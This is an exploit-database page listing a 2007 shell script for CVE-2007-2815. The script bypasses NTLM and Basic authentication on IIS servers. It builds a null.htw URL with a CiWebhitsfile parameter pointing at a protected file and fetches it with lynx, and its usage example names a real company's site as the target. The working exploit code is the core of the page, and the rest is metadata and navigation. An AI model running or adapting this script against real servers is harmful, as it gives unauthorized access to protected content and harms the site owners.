header-logo
Suggest Exploit
vendor:
Unknown
by:
sha0[at]badchecksum.net
N/A
CVSS
N/A
Bypass vulnerability
Unknown
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-2815
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2007

NTLM && BASIC AUTH BYPASS

This script allows an attacker to bypass NTLM and Basic Authentication. It takes a website and a protected object as input parameters. It then constructs a malicious URL and uses the Lynx browser to access it. The URL contains parameters that bypass the authentication and access the protected object. The script is based on the vulnerability described in CVE-2007-2815.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: https://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# milw0rm.com [2007-05-31]

Navigation

Suggest Exploit

Services By CQR